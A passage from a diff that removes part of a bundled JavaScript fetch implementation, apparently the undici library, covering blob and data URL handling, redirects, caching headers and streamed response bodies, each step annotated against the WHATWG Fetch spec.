If request’s method is not `GET`, blobURLEntry is null, or blobURLEntry’s - // object is not a Blob object, then return a network error. - if (request.method !== 'GET' || !isBlobLike(blobURLEntryObject)) { - return Promise.resolve(makeNetworkError('invalid method')) - } - - // 3. Let bodyWithType be the result of safely extracting blobURLEntry’s object. - const bodyWithType = safelyExtractBody(blobURLEntryObject) - - // 4. Let body be bodyWithType’s body. - const body = bodyWithType[0] - - // 5. Let length be body’s length, serialized and isomorphic encoded. - const length = isomorphicEncode(`${body.length}`) - - // 6. Let type be bodyWithType’s type if it is non-null; otherwise the empty byte sequence. - const type = bodyWithType[1] ?? '' - - // 7. Return a new response whose status message is `OK`, header list is - // « (`Content-Length`, length), (`Content-Type`, type) », and body is body. - const response = makeResponse({ - statusText: 'OK', - headersList: [ - ['content-length', { name: 'Content-Length', value: length }], - ['content-type', { name: 'Content-Type', value: type }] - ] - }) - - response.body = body - - return Promise.resolve(response) - } - case 'data:': { - // 1. Let dataURLStruct be the result of running the - // data: URL processor on request’s current URL. - const currentURL = requestCurrentURL(request) - const dataURLStruct = dataURLProcessor(currentURL) - - // 2. If dataURLStruct is failure, then return a - // network error. - if (dataURLStruct === 'failure') { - return Promise.resolve(makeNetworkError('failed to fetch the data URL')) - } - - // 3. Let mimeType be dataURLStruct’s MIME type, serialized. - const mimeType = serializeAMimeType(dataURLStruct.mimeType) - - // 4. Return a response whose status message is `OK`, - // header list is « (`Content-Type`, mimeType) », - // and body is dataURLStruct’s body as a body. 
- return Promise.resolve(makeResponse({ - statusText: 'OK', - headersList: [ - ['content-type', { name: 'Content-Type', value: mimeType }] - ], - body: safelyExtractBody(dataURLStruct.body)[0] - })) - } - case 'file:': { - // For now, unfortunate as it is, file URLs are left as an exercise for the reader. - // When in doubt, return a network error. - return Promise.resolve(makeNetworkError('not implemented... yet...')) - } - case 'http:': - case 'https:': { - // Return the result of running HTTP fetch given fetchParams. - - return httpFetch(fetchParams) - .catch((err) => makeNetworkError(err)) - } - default: { - return Promise.resolve(makeNetworkError('unknown scheme')) - } - } -} - -// https://fetch.spec.whatwg.org/#finalize-response -function finalizeResponse (fetchParams, response) { - // 1. Set fetchParams’s request’s done flag. - fetchParams.request.done = true - - // 2, If fetchParams’s process response done is not null, then queue a fetch - // task to run fetchParams’s process response done given response, with - // fetchParams’s task destination. - if (fetchParams.processResponseDone != null) { - queueMicrotask(() => fetchParams.processResponseDone(response)) - } -} - -// https://fetch.spec.whatwg.org/#fetch-finale -function fetchFinale (fetchParams, response) { - // 1. If response is a network error, then: - if (response.type === 'error') { - // 1. Set response’s URL list to « fetchParams’s request’s URL list[0] ». - response.urlList = [fetchParams.request.urlList[0]] - - // 2. Set response’s timing info to the result of creating an opaque timing - // info for fetchParams’s timing info. - response.timingInfo = createOpaqueTimingInfo({ - startTime: fetchParams.timingInfo.startTime - }) - } - - // 2. Let processResponseEndOfBody be the following steps: - const processResponseEndOfBody = () => { - // 1. Set fetchParams’s request’s done flag. 
- fetchParams.request.done = true - - // If fetchParams’s process response end-of-body is not null, - // then queue a fetch task to run fetchParams’s process response - // end-of-body given response with fetchParams’s task destination. - if (fetchParams.processResponseEndOfBody != null) { - queueMicrotask(() => fetchParams.processResponseEndOfBody(response)) - } - } - - // 3. If fetchParams’s process response is non-null, then queue a fetch task - // to run fetchParams’s process response given response, with fetchParams’s - // task destination. - if (fetchParams.processResponse != null) { - queueMicrotask(() => fetchParams.processResponse(response)) - } - - // 4. If response’s body is null, then run processResponseEndOfBody. - if (response.body == null) { - processResponseEndOfBody() - } else { - // 5. Otherwise: - - // 1. Let transformStream be a new a TransformStream. - - // 2. Let identityTransformAlgorithm be an algorithm which, given chunk, - // enqueues chunk in transformStream. - const identityTransformAlgorithm = (chunk, controller) => { - controller.enqueue(chunk) - } - - // 3. Set up transformStream with transformAlgorithm set to identityTransformAlgorithm - // and flushAlgorithm set to processResponseEndOfBody. - const transformStream = new TransformStream({ - start () {}, - transform: identityTransformAlgorithm, - flush: processResponseEndOfBody - }, { - size () { - return 1 - } - }, { - size () { - return 1 - } - }) - - // 4. Set response’s body to the result of piping response’s body through transformStream. - response.body = { stream: response.body.stream.pipeThrough(transformStream) } - } - - // 6. If fetchParams’s process response consume body is non-null, then: - if (fetchParams.processResponseConsumeBody != null) { - // 1. Let processBody given nullOrBytes be this step: run fetchParams’s - // process response consume body given response and nullOrBytes. 
- const processBody = (nullOrBytes) => fetchParams.processResponseConsumeBody(response, nullOrBytes) - - // 2. Let processBodyError be this step: run fetchParams’s process - // response consume body given response and failure. - const processBodyError = (failure) => fetchParams.processResponseConsumeBody(response, failure) - - // 3. If response’s body is null, then queue a fetch task to run processBody - // given null, with fetchParams’s task destination. - if (response.body == null) { - queueMicrotask(() => processBody(null)) - } else { - // 4. Otherwise, fully read response’s body given processBody, processBodyError, - // and fetchParams’s task destination. - return fullyReadBody(response.body, processBody, processBodyError) - } - return Promise.resolve() - } -} - -// https://fetch.spec.whatwg.org/#http-fetch -async function httpFetch (fetchParams) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. Let actualResponse be null. - let actualResponse = null - - // 4. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 5. If request’s service-workers mode is "all", then: - if (request.serviceWorkers === 'all') { - // TODO - } - - // 6. If response is null, then: - if (response === null) { - // 1. If makeCORSPreflight is true and one of these conditions is true: - // TODO - - // 2. If request’s redirect mode is "follow", then set request’s - // service-workers mode to "none". - if (request.redirect === 'follow') { - request.serviceWorkers = 'none' - } - - // 3. Set response and actualResponse to the result of running - // HTTP-network-or-cache fetch given fetchParams. - actualResponse = response = await httpNetworkOrCacheFetch(fetchParams) - - // 4. If request’s response tainting is "cors" and a CORS check - // for request and response returns failure, then return a network error. 
- if ( - request.responseTainting === 'cors' && - corsCheck(request, response) === 'failure' - ) { - return makeNetworkError('cors failure') - } - - // 5. If the TAO check for request and response returns failure, then set - // request’s timing allow failed flag. - if (TAOCheck(request, response) === 'failure') { - request.timingAllowFailed = true - } - } - - // 7. If either request’s response tainting or response’s type - // is "opaque", and the cross-origin resource policy check with - // request’s origin, request’s client, request’s destination, - // and actualResponse returns blocked, then return a network error. - if ( - (request.responseTainting === 'opaque' || response.type === 'opaque') && - crossOriginResourcePolicyCheck( - request.origin, - request.client, - request.destination, - actualResponse - ) === 'blocked' - ) { - return makeNetworkError('blocked') - } - - // 8. If actualResponse’s status is a redirect status, then: - if (redirectStatusSet.has(actualResponse.status)) { - // 1. If actualResponse’s status is not 303, request’s body is not null, - // and the connection uses HTTP/2, then user agents may, and are even - // encouraged to, transmit an RST_STREAM frame. - // See, https://github.com/whatwg/fetch/issues/1288 - if (request.redirect !== 'manual') { - fetchParams.controller.connection.destroy() - } - - // 2. Switch on request’s redirect mode: - if (request.redirect === 'error') { - // Set response to a network error. - response = makeNetworkError('unexpected redirect') - } else if (request.redirect === 'manual') { - // Set response to an opaque-redirect filtered response whose internal - // response is actualResponse. - // NOTE(spec): On the web this would return an `opaqueredirect` response, - // but that doesn't make sense server side. - // See https://github.com/nodejs/undici/issues/1193. 
- response = actualResponse - } else if (request.redirect === 'follow') { - // Set response to the result of running HTTP-redirect fetch given - // fetchParams and response. - response = await httpRedirectFetch(fetchParams, response) - } else { - assert(false) - } - } - - // 9. Set response’s timing info to timingInfo. - response.timingInfo = timingInfo - - // 10. Return response. - return response -} - -// https://fetch.spec.whatwg.org/#http-redirect-fetch -function httpRedirectFetch (fetchParams, response) { - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let actualResponse be response, if response is not a filtered response, - // and response’s internal response otherwise. - const actualResponse = response.internalResponse - ? response.internalResponse - : response - - // 3. Let locationURL be actualResponse’s location URL given request’s current - // URL’s fragment. - let locationURL - - try { - locationURL = responseLocationURL( - actualResponse, - requestCurrentURL(request).hash - ) - - // 4. If locationURL is null, then return response. - if (locationURL == null) { - return response - } - } catch (err) { - // 5. If locationURL is failure, then return a network error. - return Promise.resolve(makeNetworkError(err)) - } - - // 6. If locationURL’s scheme is not an HTTP(S) scheme, then return a network - // error. - if (!urlIsHttpHttpsScheme(locationURL)) { - return Promise.resolve(makeNetworkError('URL scheme must be a HTTP(S) scheme')) - } - - // 7. If request’s redirect count is 20, then return a network error. - if (request.redirectCount === 20) { - return Promise.resolve(makeNetworkError('redirect count exceeded')) - } - - // 8. Increase request’s redirect count by 1. - request.redirectCount += 1 - - // 9. If request’s mode is "cors", locationURL includes credentials, and - // request’s origin is not same origin with locationURL’s origin, then return - // a network error. 
- if ( - request.mode === 'cors' && - (locationURL.username || locationURL.password) && - !sameOrigin(request, locationURL) - ) { - return Promise.resolve(makeNetworkError('cross origin not allowed for request mode "cors"')) - } - - // 10. If request’s response tainting is "cors" and locationURL includes - // credentials, then return a network error. - if ( - request.responseTainting === 'cors' && - (locationURL.username || locationURL.password) - ) { - return Promise.resolve(makeNetworkError( - 'URL cannot contain credentials for request mode "cors"' - )) - } - - // 11. If actualResponse’s status is not 303, request’s body is non-null, - // and request’s body’s source is null, then return a network error. - if ( - actualResponse.status !== 303 && - request.body != null && - request.body.source == null - ) { - return Promise.resolve(makeNetworkError()) - } - - // 12. If one of the following is true - // - actualResponse’s status is 301 or 302 and request’s method is `POST` - // - actualResponse’s status is 303 and request’s method is not `GET` or `HEAD` - if ( - ([301, 302].includes(actualResponse.status) && request.method === 'POST') || - (actualResponse.status === 303 && - !GET_OR_HEAD.includes(request.method)) - ) { - // then: - // 1. Set request’s method to `GET` and request’s body to null. - request.method = 'GET' - request.body = null - - // 2. For each headerName of request-body-header name, delete headerName from - // request’s header list. - for (const headerName of requestBodyHeader) { - request.headersList.delete(headerName) - } - } - - // 13. If request’s current URL’s origin is not same origin with locationURL’s - // origin, then for each headerName of CORS non-wildcard request-header name, - // delete headerName from request’s header list. 
- if (!sameOrigin(requestCurrentURL(request), locationURL)) { - // https://fetch.spec.whatwg.org/#cors-non-wildcard-request-header-name - request.headersList.delete('authorization') - - // https://fetch.spec.whatwg.org/#authentication-entries - request.headersList.delete('proxy-authorization', true) - - // "Cookie" and "Host" are forbidden request-headers, which undici doesn't implement. - request.headersList.delete('cookie') - request.headersList.delete('host') - } - - // 14. If request’s body is non-null, then set request’s body to the first return - // value of safely extracting request’s body’s source. - if (request.body != null) { - assert(request.body.source != null) - request.body = safelyExtractBody(request.body.source)[0] - } - - // 15. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 16. Set timingInfo’s redirect end time and post-redirect start time to the - // coarsened shared current time given fetchParams’s cross-origin isolated - // capability. - timingInfo.redirectEndTime = timingInfo.postRedirectStartTime = - coarsenedSharedCurrentTime(fetchParams.crossOriginIsolatedCapability) - - // 17. If timingInfo’s redirect start time is 0, then set timingInfo’s - // redirect start time to timingInfo’s start time. - if (timingInfo.redirectStartTime === 0) { - timingInfo.redirectStartTime = timingInfo.startTime - } - - // 18. Append locationURL to request’s URL list. - request.urlList.push(locationURL) - - // 19. Invoke set request’s referrer policy on redirect on request and - // actualResponse. - setRequestReferrerPolicyOnRedirect(request, actualResponse) - - // 20. Return the result of running main fetch given fetchParams and true. - return mainFetch(fetchParams, true) -} - -// https://fetch.spec.whatwg.org/#http-network-or-cache-fetch -async function httpNetworkOrCacheFetch ( - fetchParams, - isAuthenticationFetch = false, - isNewConnectionFetch = false -) { - // 1. Let request be fetchParams’s request. 
- const request = fetchParams.request - - // 2. Let httpFetchParams be null. - let httpFetchParams = null - - // 3. Let httpRequest be null. - let httpRequest = null - - // 4. Let response be null. - let response = null - - // 5. Let storedResponse be null. - // TODO: cache - - // 6. Let httpCache be null. - const httpCache = null - - // 7. Let the revalidatingFlag be unset. - const revalidatingFlag = false - - // 8. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. If request’s window is "no-window" and request’s redirect mode is - // "error", then set httpFetchParams to fetchParams and httpRequest to - // request. - if (request.window === 'no-window' && request.redirect === 'error') { - httpFetchParams = fetchParams - httpRequest = request - } else { - // Otherwise: - - // 1. Set httpRequest to a clone of request. - httpRequest = makeRequest(request) - - // 2. Set httpFetchParams to a copy of fetchParams. - httpFetchParams = { ...fetchParams } - - // 3. Set httpFetchParams’s request to httpRequest. - httpFetchParams.request = httpRequest - } - - // 3. Let includeCredentials be true if one of - const includeCredentials = - request.credentials === 'include' || - (request.credentials === 'same-origin' && - request.responseTainting === 'basic') - - // 4. Let contentLength be httpRequest’s body’s length, if httpRequest’s - // body is non-null; otherwise null. - const contentLength = httpRequest.body ? httpRequest.body.length : null - - // 5. Let contentLengthHeaderValue be null. - let contentLengthHeaderValue = null - - // 6. If httpRequest’s body is null and httpRequest’s method is `POST` or - // `PUT`, then set contentLengthHeaderValue to `0`. - if ( - httpRequest.body == null && - ['POST', 'PUT'].includes(httpRequest.method) - ) { - contentLengthHeaderValue = '0' - } - - // 7. If contentLength is non-null, then set contentLengthHeaderValue to - // contentLength, serialized and isomorphic encoded. 
- if (contentLength != null) { - contentLengthHeaderValue = isomorphicEncode(`${contentLength}`) - } - - // 8. If contentLengthHeaderValue is non-null, then append - // `Content-Length`/contentLengthHeaderValue to httpRequest’s header - // list. - if (contentLengthHeaderValue != null) { - httpRequest.headersList.append('content-length', contentLengthHeaderValue) - } - - // 9. If contentLengthHeaderValue is non-null, then append (`Content-Length`, - // contentLengthHeaderValue) to httpRequest’s header list. - - // 10. If contentLength is non-null and httpRequest’s keepalive is true, - // then: - if (contentLength != null && httpRequest.keepalive) { - // NOTE: keepalive is a noop outside of browser context. - } - - // 11. If httpRequest’s referrer is a URL, then append - // `Referer`/httpRequest’s referrer, serialized and isomorphic encoded, - // to httpRequest’s header list. - if (httpRequest.referrer instanceof URL) { - httpRequest.headersList.append('referer', isomorphicEncode(httpRequest.referrer.href)) - } - - // 12. Append a request `Origin` header for httpRequest. - appendRequestOriginHeader(httpRequest) - - // 13. Append the Fetch metadata headers for httpRequest. [FETCH-METADATA] - appendFetchMetadata(httpRequest) - - // 14. If httpRequest’s header list does not contain `User-Agent`, then - // user agents should append `User-Agent`/default `User-Agent` value to - // httpRequest’s header list. - if (!httpRequest.headersList.contains('user-agent')) { - httpRequest.headersList.append('user-agent', typeof esbuildDetection === 'undefined' ? 'undici' : 'node') - } - - // 15. If httpRequest’s cache mode is "default" and httpRequest’s header - // list contains `If-Modified-Since`, `If-None-Match`, - // `If-Unmodified-Since`, `If-Match`, or `If-Range`, then set - // httpRequest’s cache mode to "no-store". 
- if ( - httpRequest.cache === 'default' && - (httpRequest.headersList.contains('if-modified-since') || - httpRequest.headersList.contains('if-none-match') || - httpRequest.headersList.contains('if-unmodified-since') || - httpRequest.headersList.contains('if-match') || - httpRequest.headersList.contains('if-range')) - ) { - httpRequest.cache = 'no-store' - } - - // 16. If httpRequest’s cache mode is "no-cache", httpRequest’s prevent - // no-cache cache-control header modification flag is unset, and - // httpRequest’s header list does not contain `Cache-Control`, then append - // `Cache-Control`/`max-age=0` to httpRequest’s header list. - if ( - httpRequest.cache === 'no-cache' && - !httpRequest.preventNoCacheCacheControlHeaderModification && - !httpRequest.headersList.contains('cache-control') - ) { - httpRequest.headersList.append('cache-control', 'max-age=0') - } - - // 17. If httpRequest’s cache mode is "no-store" or "reload", then: - if (httpRequest.cache === 'no-store' || httpRequest.cache === 'reload') { - // 1. If httpRequest’s header list does not contain `Pragma`, then append - // `Pragma`/`no-cache` to httpRequest’s header list. - if (!httpRequest.headersList.contains('pragma')) { - httpRequest.headersList.append('pragma', 'no-cache') - } - - // 2. If httpRequest’s header list does not contain `Cache-Control`, - // then append `Cache-Control`/`no-cache` to httpRequest’s header list. - if (!httpRequest.headersList.contains('cache-control')) { - httpRequest.headersList.append('cache-control', 'no-cache') - } - } - - // 18. If httpRequest’s header list contains `Range`, then append - // `Accept-Encoding`/`identity` to httpRequest’s header list. - if (httpRequest.headersList.contains('range')) { - httpRequest.headersList.append('accept-encoding', 'identity') - } - - // 19. Modify httpRequest’s header list per HTTP. Do not append a given - // header if httpRequest’s header list contains that header’s name. 
- // TODO: https://github.com/whatwg/fetch/issues/1285#issuecomment-896560129 - if (!httpRequest.headersList.contains('accept-encoding')) { - if (urlHasHttpsScheme(requestCurrentURL(httpRequest))) { - httpRequest.headersList.append('accept-encoding', 'br, gzip, deflate') - } else { - httpRequest.headersList.append('accept-encoding', 'gzip, deflate') - } - } - - httpRequest.headersList.delete('host') - - // 20. If includeCredentials is true, then: - if (includeCredentials) { - // 1. If the user agent is not configured to block cookies for httpRequest - // (see section 7 of [COOKIES]), then: - // TODO: credentials - // 2. If httpRequest’s header list does not contain `Authorization`, then: - // TODO: credentials - } - - // 21. If there’s a proxy-authentication entry, use it as appropriate. - // TODO: proxy-authentication - - // 22. Set httpCache to the result of determining the HTTP cache - // partition, given httpRequest. - // TODO: cache - - // 23. If httpCache is null, then set httpRequest’s cache mode to - // "no-store". - if (httpCache == null) { - httpRequest.cache = 'no-store' - } - - // 24. If httpRequest’s cache mode is neither "no-store" nor "reload", - // then: - if (httpRequest.mode !== 'no-store' && httpRequest.mode !== 'reload') { - // TODO: cache - } - - // 9. If aborted, then return the appropriate network error for fetchParams. - // TODO - - // 10. If response is null, then: - if (response == null) { - // 1. If httpRequest’s cache mode is "only-if-cached", then return a - // network error. - if (httpRequest.mode === 'only-if-cached') { - return makeNetworkError('only if cached') - } - - // 2. Let forwardResponse be the result of running HTTP-network fetch - // given httpFetchParams, includeCredentials, and isNewConnectionFetch. - const forwardResponse = await httpNetworkFetch( - httpFetchParams, - includeCredentials, - isNewConnectionFetch - ) - - // 3. 
If httpRequest’s method is unsafe and forwardResponse’s status is - // in the range 200 to 399, inclusive, invalidate appropriate stored - // responses in httpCache, as per the "Invalidation" chapter of HTTP - // Caching, and set storedResponse to null. [HTTP-CACHING] - if ( - !safeMethodsSet.has(httpRequest.method) && - forwardResponse.status >= 200 && - forwardResponse.status <= 399 - ) { - // TODO: cache - } - - // 4. If the revalidatingFlag is set and forwardResponse’s status is 304, - // then: - if (revalidatingFlag && forwardResponse.status === 304) { - // TODO: cache - } - - // 5. If response is null, then: - if (response == null) { - // 1. Set response to forwardResponse. - response = forwardResponse - - // 2. Store httpRequest and forwardResponse in httpCache, as per the - // "Storing Responses in Caches" chapter of HTTP Caching. [HTTP-CACHING] - // TODO: cache - } - } - - // 11. Set response’s URL list to a clone of httpRequest’s URL list. - response.urlList = [...httpRequest.urlList] - - // 12. If httpRequest’s header list contains `Range`, then set response’s - // range-requested flag. - if (httpRequest.headersList.contains('range')) { - response.rangeRequested = true - } - - // 13. Set response’s request-includes-credentials to includeCredentials. - response.requestIncludesCredentials = includeCredentials - - // 14. If response’s status is 401, httpRequest’s response tainting is not - // "cors", includeCredentials is true, and request’s window is an environment - // settings object, then: - // TODO - - // 15. If response’s status is 407, then: - if (response.status === 407) { - // 1. If request’s window is "no-window", then return a network error. - if (request.window === 'no-window') { - return makeNetworkError() - } - - // 2. ??? - - // 3. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams)) { - return makeAppropriateNetworkError(fetchParams) - } - - // 4. 
Prompt the end user as appropriate in request’s window and store - // the result as a proxy-authentication entry. [HTTP-AUTH] - // TODO: Invoke some kind of callback? - - // 5. Set response to the result of running HTTP-network-or-cache fetch given - // fetchParams. - // TODO - return makeNetworkError('proxy authentication required') - } - - // 16. If all of the following are true - if ( - // response’s status is 421 - response.status === 421 && - // isNewConnectionFetch is false - !isNewConnectionFetch && - // request’s body is null, or request’s body is non-null and request’s body’s source is non-null - (request.body == null || request.body.source != null) - ) { - // then: - - // 1. If fetchParams is canceled, then return the appropriate network error for fetchParams. - if (isCancelled(fetchParams)) { - return makeAppropriateNetworkError(fetchParams) - } - - // 2. Set response to the result of running HTTP-network-or-cache - // fetch given fetchParams, isAuthenticationFetch, and true. - - // TODO (spec): The spec doesn't specify this but we need to cancel - // the active response before we can start a new one. - // https://github.com/whatwg/fetch/issues/1293 - fetchParams.controller.connection.destroy() - - response = await httpNetworkOrCacheFetch( - fetchParams, - isAuthenticationFetch, - true - ) - } - - // 17. If isAuthenticationFetch is true, then create an authentication entry - if (isAuthenticationFetch) { - // TODO - } - - // 18. Return response. - return response -} - -// https://fetch.spec.whatwg.org/#http-network-fetch -async function httpNetworkFetch ( - fetchParams, - includeCredentials = false, - forceNewConnection = false -) { - assert(!fetchParams.controller.connection || fetchParams.controller.connection.destroyed) - - fetchParams.controller.connection = { - abort: null, - destroyed: false, - destroy (err) { - if (!this.destroyed) { - this.destroyed = true - this.abort?.(err ?? 
new DOMException('The operation was aborted.', 'AbortError')) - } - } - } - - // 1. Let request be fetchParams’s request. - const request = fetchParams.request - - // 2. Let response be null. - let response = null - - // 3. Let timingInfo be fetchParams’s timing info. - const timingInfo = fetchParams.timingInfo - - // 4. Let httpCache be the result of determining the HTTP cache partition, - // given request. - // TODO: cache - const httpCache = null - - // 5. If httpCache is null, then set request’s cache mode to "no-store". - if (httpCache == null) { - request.cache = 'no-store' - } - - // 6. Let networkPartitionKey be the result of determining the network - // partition key given request. - // TODO - - // 7. Let newConnection be "yes" if forceNewConnection is true; otherwise - // "no". - const newConnection = forceNewConnection ? 'yes' : 'no' // eslint-disable-line no-unused-vars - - // 8. Switch on request’s mode: - if (request.mode === 'websocket') { - // Let connection be the result of obtaining a WebSocket connection, - // given request’s current URL. - // TODO - } else { - // Let connection be the result of obtaining a connection, given - // networkPartitionKey, request’s current URL’s origin, - // includeCredentials, and forceNewConnection. - // TODO - } - - // 9. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. If connection is failure, then return a network error. - - // 2. Set timingInfo’s final connection timing info to the result of - // calling clamp and coarsen connection timing info with connection’s - // timing info, timingInfo’s post-redirect start time, and fetchParams’s - // cross-origin isolated capability. - - // 3. If connection is not an HTTP/2 connection, request’s body is non-null, - // and request’s body’s source is null, then append (`Transfer-Encoding`, - // `chunked`) to request’s header list. - - // 4. 
Set timingInfo’s final network-request start time to the coarsened - // shared current time given fetchParams’s cross-origin isolated - // capability. - - // 5. Set response to the result of making an HTTP request over connection - // using request with the following caveats: - - // - Follow the relevant requirements from HTTP. [HTTP] [HTTP-SEMANTICS] - // [HTTP-COND] [HTTP-CACHING] [HTTP-AUTH] - - // - If request’s body is non-null, and request’s body’s source is null, - // then the user agent may have a buffer of up to 64 kibibytes and store - // a part of request’s body in that buffer. If the user agent reads from - // request’s body beyond that buffer’s size and the user agent needs to - // resend request, then instead return a network error. - - // - Set timingInfo’s final network-response start time to the coarsened - // shared current time given fetchParams’s cross-origin isolated capability, - // immediately after the user agent’s HTTP parser receives the first byte - // of the response (e.g., frame header bytes for HTTP/2 or response status - // line for HTTP/1.x). - - // - Wait until all the headers are transmitted. - - // - Any responses whose status is in the range 100 to 199, inclusive, - // and is not 101, are to be ignored, except for the purposes of setting - // timingInfo’s final network-response start time above. - - // - If request’s header list contains `Transfer-Encoding`/`chunked` and - // response is transferred via HTTP/1.0 or older, then return a network - // error. - - // - If the HTTP request results in a TLS client certificate dialog, then: - - // 1. If request’s window is an environment settings object, make the - // dialog available in request’s window. - - // 2. Otherwise, return a network error. - - // To transmit request’s body body, run these steps: - let requestBody = null - // 1. 
If body is null and fetchParams’s process request end-of-body is - // non-null, then queue a fetch task given fetchParams’s process request - // end-of-body and fetchParams’s task destination. - if (request.body == null && fetchParams.processRequestEndOfBody) { - queueMicrotask(() => fetchParams.processRequestEndOfBody()) - } else if (request.body != null) { - // 2. Otherwise, if body is non-null: - - // 1. Let processBodyChunk given bytes be these steps: - const processBodyChunk = async function * (bytes) { - // 1. If the ongoing fetch is terminated, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. Run this step in parallel: transmit bytes. - yield bytes - - // 3. If fetchParams’s process request body is non-null, then run - // fetchParams’s process request body given bytes’s length. - fetchParams.processRequestBodyChunkLength?.(bytes.byteLength) - } - - // 2. Let processEndOfBody be these steps: - const processEndOfBody = () => { - // 1. If fetchParams is canceled, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. If fetchParams’s process request end-of-body is non-null, - // then run fetchParams’s process request end-of-body. - if (fetchParams.processRequestEndOfBody) { - fetchParams.processRequestEndOfBody() - } - } - - // 3. Let processBodyError given e be these steps: - const processBodyError = (e) => { - // 1. If fetchParams is canceled, then abort these steps. - if (isCancelled(fetchParams)) { - return - } - - // 2. If e is an "AbortError" DOMException, then abort fetchParams’s controller. - if (e.name === 'AbortError') { - fetchParams.controller.abort() - } else { - fetchParams.controller.terminate(e) - } - } - - // 4. Incrementally read request’s body given processBodyChunk, processEndOfBody, - // processBodyError, and fetchParams’s task destination. 
- requestBody = (async function * () { - try { - for await (const bytes of request.body.stream) { - yield * processBodyChunk(bytes) - } - processEndOfBody() - } catch (err) { - processBodyError(err) - } - })() - } - - try { - // socket is only provided for websockets - const { body, status, statusText, headersList, socket } = await dispatch({ body: requestBody }) - - if (socket) { - response = makeResponse({ status, statusText, headersList, socket }) - } else { - const iterator = body[Symbol.asyncIterator]() - fetchParams.controller.next = () => iterator.next() - - response = makeResponse({ status, statusText, headersList }) - } - } catch (err) { - // 10. If aborted, then: - if (err.name === 'AbortError') { - // 1. If connection uses HTTP/2, then transmit an RST_STREAM frame. - fetchParams.controller.connection.destroy() - - // 2. Return the appropriate network error for fetchParams. - return makeAppropriateNetworkError(fetchParams, err) - } - - return makeNetworkError(err) - } - - // 11. Let pullAlgorithm be an action that resumes the ongoing fetch - // if it is suspended. - const pullAlgorithm = () => { - fetchParams.controller.resume() - } - - // 12. Let cancelAlgorithm be an algorithm that aborts fetchParams’s - // controller with reason, given reason. - const cancelAlgorithm = (reason) => { - fetchParams.controller.abort(reason) - } - - // 13. Let highWaterMark be a non-negative, non-NaN number, chosen by - // the user agent. - // TODO - - // 14. Let sizeAlgorithm be an algorithm that accepts a chunk object - // and returns a non-negative, non-NaN, non-infinite number, chosen by the user agent. - // TODO - - // 15. Let stream be a new ReadableStream. - // 16. Set up stream with pullAlgorithm set to pullAlgorithm, - // cancelAlgorithm set to cancelAlgorithm, highWaterMark set to - // highWaterMark, and sizeAlgorithm set to sizeAlgorithm. 
- if (!ReadableStream) { - ReadableStream = (__nccwpck_require__(5356).ReadableStream) - } - - const stream = new ReadableStream( - { - async start (controller) { - fetchParams.controller.controller = controller - }, - async pull (controller) { - await pullAlgorithm(controller) - }, - async cancel (reason) { - await cancelAlgorithm(reason) - } - }, - { - highWaterMark: 0, - size () { - return 1 - } - } - ) - - // 17. Run these steps, but abort when the ongoing fetch is terminated: - - // 1. Set response’s body to a new body whose stream is stream. - response.body = { stream } - - // 2. If response is not a network error and request’s cache mode is - // not "no-store", then update response in httpCache for request. - // TODO - - // 3. If includeCredentials is true and the user agent is not configured - // to block cookies for request (see section 7 of [COOKIES]), then run the - // "set-cookie-string" parsing algorithm (see section 5.2 of [COOKIES]) on - // the value of each header whose name is a byte-case-insensitive match for - // `Set-Cookie` in response’s header list, if any, and request’s current URL. - // TODO - - // 18. If aborted, then: - // TODO - - // 19. Run these steps in parallel: - - // 1. Run these steps, but abort when fetchParams is canceled: - fetchParams.controller.on('terminated', onAborted) - fetchParams.controller.resume = async () => { - // 1. While true - while (true) { - // 1-3. See onData... - - // 4. Set bytes to the result of handling content codings given - // codings and bytes. - let bytes - let isFailure - try { - const { done, value } = await fetchParams.controller.next() - - if (isAborted(fetchParams)) { - break - } - - bytes = done ? undefined : value - } catch (err) { - if (fetchParams.controller.ended && !timingInfo.encodedBodySize) { - // zlib doesn't like empty streams. - bytes = undefined - } else { - bytes = err - - // err may be propagated from the result of calling readablestream.cancel, - // which might not be an error. 
https://github.com/nodejs/undici/issues/2009 - isFailure = true - } - } - - if (bytes === undefined) { - // 2. Otherwise, if the bytes transmission for response’s message - // body is done normally and stream is readable, then close - // stream, finalize response for fetchParams and response, and - // abort these in-parallel steps. - readableStreamClose(fetchParams.controller.controller) - - finalizeResponse(fetchParams, response) - - return - } - - // 5. Increase timingInfo’s decoded body size by bytes’s length. - timingInfo.decodedBodySize += bytes?.byteLength ?? 0 - - // 6. If bytes is failure, then terminate fetchParams’s controller. - if (isFailure) { - fetchParams.controller.terminate(bytes) - return - } - - // 7. Enqueue a Uint8Array wrapping an ArrayBuffer containing bytes - // into stream. - fetchParams.controller.controller.enqueue(new Uint8Array(bytes)) - - // 8. If stream is errored, then terminate the ongoing fetch. - if (isErrored(stream)) { - fetchParams.controller.terminate() - return - } - - // 9. If stream doesn’t need more data ask the user agent to suspend - // the ongoing fetch. - if (!fetchParams.controller.controller.desiredSize) { - return - } - } - } - - // 2. If aborted, then: - function onAborted (reason) { - // 2. If fetchParams is aborted, then: - if (isAborted(fetchParams)) { - // 1. Set response’s aborted flag. - response.aborted = true - - // 2. If stream is readable, then error stream with the result of - // deserialize a serialized abort reason given fetchParams’s - // controller’s serialized abort reason and an - // implementation-defined realm. - if (isReadable(stream)) { - fetchParams.controller.controller.error( - fetchParams.controller.serializedAbortReason - ) - } - } else { - // 3. Otherwise, if stream is readable, error stream with a TypeError. - if (isReadable(stream)) { - fetchParams.controller.controller.error(new TypeError('terminated', { - cause: isErrorLike(reason) ? reason : undefined - })) - } - } - - // 4. 
